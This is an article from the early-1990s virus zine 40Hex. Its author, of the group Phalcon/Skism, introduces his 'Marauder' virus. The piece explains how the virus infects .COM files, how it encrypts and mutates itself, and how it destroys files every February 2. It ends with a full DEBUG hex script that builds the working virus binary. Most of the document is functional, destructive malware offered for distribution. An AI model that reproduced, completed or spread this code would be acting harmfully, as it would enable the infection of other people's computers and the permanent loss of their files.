40Hex Issue 4                                            December 1991

"I take my boys everywhere I go, cause I'm paranoid..."

                           The Marauder Virus
                           ------------------


    December marks the first year of the group Skism.  The alliance of
    Phalcon/Skism took place around July 1991.  Me and a few freinds at
    school started the group by hacking old viruses into new strains.
    Well I have lost contact with these people since then and a new
    breed of members has risen from the ashes.

    Well, I myself have learned a lot over the year.  I went from virus
    hacker with about three viruses to my name, to overwritting man,
    to what I am now.  An advanced (kind of) level assembler programmer,
    writing parasitic infectors.  Well come this time next year I belive
    I'll be into more major stuff, ya know sick mother fucking DIR-2
    type action.  I've written a couple of TSR viruses shells, nothing
    completed yet.  Well anyway here's my personal latest creation -
    Marauder.  What Marauder is, is this ----

Marauder Virus
By Hellraiser
of Phalcon/Skism

Aliases: Deadpool-B, 808-B, 860.

Marauder is a non-overwriting, non-resident, encrypting, semi-mutating,
.COM file infector.

When a file is infected with the Marauder Virus the virus will search
the current path for a .COM file and infect it, adding 860 bytes to the
files size.  If not .COM files reside in the current directory, the
virus will go up one directory and check for .COM files to infect untill
it reaches the root.  At the root directory the virus will scan for
other directorys to find .COM files, until one uninfected .COM file is
found.  If no .COM files are found on the disk the virus will terminate
it search and return to the currently running program.

If an infected file is run on Feburary second of any year, the virus
will destroys all files in the current directory, by overwritting them
with message code.  The files will not run when executed, just terminate
upon reading the first line.  There is no way to recover the files once
the virus destroys them.  After this control will be given back to the
host program.

The Maruder virus is able to infect any .COM file no matter what
attribute... Hidden, System, Read-Only, etc... The files date, time, and
attribute will not be changed after a file becomes infected.

The virus will not cause a system error if run on a write-protected
floppy or fixed-disk, merely terminate any attempt of infection.

The virus will not infect files under 16 bytes or over 64,675 bytes.

For the most part the virus is randomly encrypted with each passing
infection, the small part of the program code which is not encrypted
mutates between two different, but comaptable strain of bytes.

There is not way of detecting the virus infections other than the
addition of 860 bytes to infected files, in other words, system-run time
is not affected at all.  If any run-time is affected it is the split
second it takes for the virus to infect a file.

The virus causes no damage to disk sectors or boot records etc... The
only perminate damage is the destuction of all files in the current
directory on 02/02/XX.

And here it is...

-------------------------------------------------------------------------------
n target.com
e 0100  E9 61 00 88 68 69 73 20 66 69 6C 65 20 69 73 20
e 0110  69 6E 66 65 63 74 65 64 20 77 69 74 68 20 74 68
e 0120  65 20 4D 61 72 61 75 64 65 72 20 76 69 72 75 73
e 0130  2E 20 31 39 39 32 2C 20 48 65 6C 6C 72 61 69 73
e 0140  65 72 20 50 68 61 6C 63 6F 6E 2F 53 6B 69 73 6D
e 0150  2E 0D 0A 24 20 20 20 20 20 20 20 B4 09 BA 03 01
e 0160  CD 21 CD 20 E8 00 00 5E 81 EE 0E 01 E8 05 00 E9
e 0170  85 00 3A 28 8B EE 81 C6 65 04 8B FE 50 53 51 52
e 0180  B9 8F 01 FD AD 33 86 19 01 AB E2 F8 5A 59 5B 58
e 0190  8B F5 C3 E8 DE FF CD 21 E8 D9 FF C3 7A 6B 7B 6A
e 01A0  91 B5 13 99 FC 93 D4 51 13 99 EC EE 99 E7 4A 49
e 01B0  4B 48 99 FC 93 D4 77 16 99 EC 42 41 43 40 AB 9D
e 01C0  13 EF 48 4B 49 4A 99 E7 DF 32 32 49 5F 73 60 73
e 01D0  67 76 77 60 4F 32 23 2B 2B 20 32 5A 77 7E 7E 60
e 01E0  73 7B 61 77 60 32 3F 32 42 7A 73 7E 71 7D 7C 3D
e 01F0  41 79 7B 61 7F 3C 1A 2E 82 0C 0F E5 1B A1 A6 76
e 0200  3E A4 BE 48 3E 2F 82 0C 1F A5 AE 4A 3E E5 1B 7E
e 0210  8E 6F 08 FA BB EE EC 2C F7 09 64 9C 23 E5 1B 2C
e 0220  7B A0 BE FB 3E 90 00 74 B3 AC EE 2C 6C 75 B7 9E
e 0230  75 2C B7 96 69 2C 83 2C 3A D4 C9 8C 6F 76 8E 32
e 0240  B7 BC 55 2C F7 09 8E 02 F7 09 BB D2 38 2A 4F 2B
e 0250  D3 96 3B 9C 74 A5 AE 10 3E 91 3D 28 F7 09 49 6C
e 0260  8E 32 B7 BC 22 2D F7 09 8E 13 B7 BC 78 2C F7 09
e 0270  48 2A D1 E2 BA 94 67 2C 3B 5C 23 98 3B A0 BE 75
e 0280  3E 9C 74 1B F3 99 29 A5 AE 16 3E E5 1B 5B 33 C1
e 0290  69 29 AA B8 8E 67 D1 DB 8E 13 B7 BC 0C 2D F7 09
e 02A0  48 DA D1 B2 B1 B4 BE 2C B3 B4 71 2C 82 29 79 1B
e 02B0  F3 A5 AE A5 3E E5 1B 5A 05 C0 A0 29 48 12 B3 AC
e 02C0  76 2C B1 B4 BD 2C B3 B4 7D 2C B1 B4 BF 2C B3 B4
e 02D0  73 2C A9 9C 05 91 3E 28 B7 BC 75 2C F7 09 BA 94
e 02E0  68 2C B2 5D 1F 90 3B 6B B1 A4 71 2C B7 BC B7 2C
e 02F0  08 C5 F7 09 8E 16 F7 09 07 2D 3A 5C 30 15 38 28
e 0300  4E 2D 8E 67 D3 7D C5 C1 E1 28 BB 94 75 2C 77 72
e 0310  4E FB D2 1F 3B 15 2A 28 48 E3 07 B7 C6 5B FC 05
e 0320  39 28 B2 8C 63 2C B2 AC 62 2C FC AC 60 2C B2 B8
e 0330  8E C1 B2 8C 6D 2C 08 E8 B2 AC 67 2C C5 AC 7F 2C
e 0340  B1 C6 D2 CF 3A 9C 16 E5 1B AB C0 28 4E DF B3 BC
e 0350  23 29 8B 20 E9 E2 B3 BC 61 2C BA D2 24 56 39 C3
e 0360  1A B8 B7 9E 79 29 B7 96 21 29 83 38 3A C0 82 28
e 0370  B7 9E 69 29 B7 96 09 29 83 2E 3A C0 90 28 D1 35
e 0380  AA A5 8C 71 3B A5 84 33 3B 91 2A 28 D2 B1 3A A5
e 0390  8C 41 3B A5 84 1B 3B 91 3C 28 D2 A3 3A C0 B6 28
e 03A0  B1 DD 8E 68 83 7F 39 AB FB 2D B7 BC 31 29 D2 CA
e 03B0  C7 5A 34 C0 B6 28 8E 68 83 2C 3A A5 AE 7F 3E E5
e 03C0  1B 90 3B 7F B1 A4 73 2C B1 BC 7D 2C B1 B4 76 2C
e 03D0  F7 09 8E 16 F7 09 82 29 79 A3 B6 63 3E A5 AE A5
e 03E0  3E 1A D7 E5 1B 9C 01 A5 AE FB 3E E5 1B 9C 20 92
e 03F0  BA 28 F7 09 6C 75 82 0C 1F A5 AE 76 3E E5 1B A5
e 0400  8C 7B 3E 97 3A 29 83 2C 3A D4 C9 8C 85 28 3B D7
e 0410  DD C0 22 28 8E 66 83 2F 3A A5 AE 16 3E E5 1B 5A
e 0420  F6 C0 06 28 8E 67 D1 DD C6 DB 9E EB B1 DD BB EE
e 0430  79 29 B1 D6 83 05 3A 85 09 AE 61 2C 91 CA C2 A3
e 0440  CF EB 82 28 78 1B F3 1B E8 E5 1B EB 82 2A 78 1B
e 0450  E8 1B F3 E5 1B EB 82 2A 07 A5 AE A5 3E E5 1B EB
e 0460  D2 DB C5 5A 11 A3 E2 7B D2 C9 C5 93 15 28 CD DB
e 0470  B1 E0 61 79 D2 E3 C5 71 6B 9C 7A 91 15 28 B7 BC
e 0480  55 29 F7 09 48 2E 63 61 D9 2A D1 C4 8E 16 F7 09
e 0490  F9 02 14 6B 75 65 3A 02 14 02 3A 06 14 28 3B 28
e 04A0  A2 3F 36 9E 1A 2D 3A 28 D1 71 AA 7C 33 E5 1A B8
e 04B0  D3 49 3A A0 12 12 3A 7E 3B 99 24 1A FA E7 B4 2E
rcx
03C0
w
q
-------------------------------------------------------------------------------




